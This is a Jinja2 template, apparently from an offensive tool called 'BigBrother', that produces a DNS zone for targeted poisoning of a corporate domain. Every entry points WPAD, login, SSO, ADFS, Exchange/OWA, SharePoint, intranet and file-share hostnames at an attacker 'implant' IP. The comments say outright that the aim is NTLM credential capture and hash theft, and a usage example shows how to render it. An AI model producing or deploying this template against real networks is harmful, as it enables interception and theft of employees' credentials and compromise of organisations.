# BigBrother DNS Zone — Selective Redirection # # Jinja2 template for targeted DNS poisoning. Render with: # implant_ip: IP address to redirect to # target_domain: Primary target domain (e.g., "corp.local") # extra_domains: Optional list of additional domains # # Format: domain target_ip # Lines starting with # are ignored. # # Usage: # from jinja2 import Template # rendered = Template(open("selective.zone.j2").read()).render( # implant_ip="10.0.0.0", # target_domain="corp.local", # extra_domains=["intranet.company.com", "vpn.company.com"] # ) # WPAD — forces proxy autoconfiguration to implant (NTLM capture) wpad.{{ target_domain }} {{ implant_ip }} wpad {{ implant_ip }} # Internal authentication endpoints login.{{ target_domain }} {{ implant_ip }} auth.{{ target_domain }} {{ implant_ip }} sso.{{ target_domain }} {{ implant_ip }} adfs.{{ target_domain }} {{ implant_ip }} # Exchange / mail autodiscover.{{ target_domain }} {{ implant_ip }} mail.{{ target_domain }} {{ implant_ip }} owa.{{ target_domain }} {{ implant_ip }} # SharePoint / intranet intranet.{{ target_domain }} {{ implant_ip }} sharepoint.{{ target_domain }} {{ implant_ip }} portal.{{ target_domain }} {{ implant_ip }} # File shares (for hash capture) files.{{ target_domain }} {{ implant_ip }} nas.{{ target_domain }} {{ implant_ip }} dfs.{{ target_domain }} {{ implant_ip }} {% if extra_domains is defined %} # Additional targeted domains {% for domain in extra_domains %} {{ domain }} {{ implant_ip }} {% endfor %} {% endif %}